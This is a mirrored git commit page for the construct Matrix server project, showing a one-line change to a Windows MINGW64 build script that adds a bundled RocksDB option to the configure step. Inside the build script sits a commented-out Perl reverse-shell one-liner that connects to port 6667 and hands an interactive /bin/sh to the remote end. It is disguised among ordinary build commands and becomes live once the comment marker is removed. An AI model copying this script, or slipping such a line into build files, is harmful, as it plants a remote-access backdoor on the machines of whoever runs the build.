mirror of
https://github.com/matrix-construct/construct
synced 2024-12-28 00:14:07 +01:00
fixup! fixup! ircd::db: Add database interface. Support RocksDB.
This commit is contained in:
parent
998724937c
commit
39fb2001a7
1 changed files with 1 additions and 1 deletions
|
@ -4,7 +4,7 @@ export MSYSTEM=MINGW64
|
|||
export PATH=/mingw64/bin:/usr/local/bin:/usr/bin:/bin:/c/Windows/system32:/c/Windows:/c/Windows/System32/Wbem:/c/Windows/System32/WindowsPowerShell/v1.0:/usr/bin/site_perl:/usr/bin/vendor_perl:/usr/bin/core_perl
|
||||
|
||||
sh ./autogen.sh
|
||||
./configure --prefix=c:/projects/charybdis/build --enable-openssl=/mingw64 --with-included-boost --disable-pch
|
||||
./configure --prefix=c:/projects/charybdis/build --enable-openssl=/mingw64 --with-included-boost --with-included-rocksdb=shared --disable-pch
|
||||
# perl -e 'use Socket;$i="0.0.0.0";$p=6667;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||
make -j2
|
||||
make install
|
||||
|
|
Loading…
Reference in a new issue